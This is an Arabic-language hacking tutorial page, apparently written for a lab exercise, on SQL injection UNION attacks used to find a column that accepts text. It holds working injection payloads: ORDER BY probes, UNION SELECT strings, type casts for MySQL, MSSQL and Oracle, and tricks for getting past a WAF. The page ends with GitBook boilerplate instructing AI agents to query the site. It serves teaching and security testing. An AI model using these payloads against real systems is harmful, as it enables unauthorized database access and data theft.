> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ar/web/sql-injection/union-attack-to-find-a-text-compatible-column.md).

# هجوم UNION للعثور على عمود متوافق مع النص

### هجوم UNION لحقن SQL، العثور على عمود يحتوي على نص

**الهدف:** أدخل `UNION` سطرًا يحتوي على قيمة الاختبار (`PjNkGQ`) لتحديد أي عمود يقبل السلاسل النصية، ثم استخرج البيانات النصية.

#### (1) تأكيد عدد الأعمدة (إذا لم يكن معروفًا بالفعل)

* اختبر باستخدام `ORDER BY` تدريجي:

  ```sql
  ' ORDER BY 1-- -
  ' ORDER BY 2-- -
  ' ORDER BY 3-- -
  ```

عندما `ORDER BY N` يتسبب في خطأ، فإن عدد الأعمدة هو `< N`.

#### (2) حقن `UNION` صفًا يحتوي على القيمة المعطاة

* مثال لـ **3 أعمدة**:

  ```sql
  ' UNION SELECT NULL, 'PjNkGQ', NULL-- -
  ```

— إذا أظهرت الإجابة `PjNkGQ`، فإن **العمود الثاني** متوافق مع النص.

#### (3) متغيرات لتحديد العمود المرئي

* اختبر الثابت في كل موضع:

  ```sql
  ' UNION SELECT 'PjNkGQ', NULL, NULL-- -
  ' UNION SELECT NULL, NULL, 'PjNkGQ'-- -
  ```
* استخدم ثوابت منفصلة لتحديد الأعمدة المرئية:

  ```sql
  ' UNION SELECT 'A','B','C'-- -
  ```

#### (4) إدارة أخطاء الأنواع

* إذا `UNION` يفشل بسبب عدم توافق النوع، استخدم `NULL` للأعمدة غير النصية أو حوّل الثابت وفقًا لـ GBD:
* **MySQL / PostgreSQL**:

  ````
  ```sql
  ' UNION SELECT NULL, CAST('PjNkGQ' AS CHAR), NULL-- -
  ```
  ````

  * **MSSQL** :

    ```sql
    ' UNION SELECT NULL, CAST('PjNkGQ' AS VARCHAR(8000)), NULL-- -
    ```
  * **Oracle** :

    ```sql
    ' UNION SELECT NULL, TO_CHAR('PjNkGQ'), NULL-- -
    ```
* إذا كانت بعض الأعمدة تتطلب أنواعًا رقمية، فاجعل `NULL` لها NULL وضع النص فقط في العمود المرشح.

#### (5) إذا كان WAF / الفلتر يحظر `UNION`

* غيّر التعليقات / التباعد: `-- -`, `--`, `/*... */`.
* أنشئ السلسلة عبر الدوال (مثل `CONCAT('P','jNkGQ')`) لتجاوز التطبيع الصارم.

#### (6) النتيجة المتوقعة

* تحتوي الإجابة على `PjNkGQ` → تم تحديد عمود نصي. ومن هناك ابنِ `UNION SELECT` للتعداد (الجداول/الأعمدة/النسخ المستخرجة).


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ar/web/sql-injection/union-attack-to-find-a-text-compatible-column.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
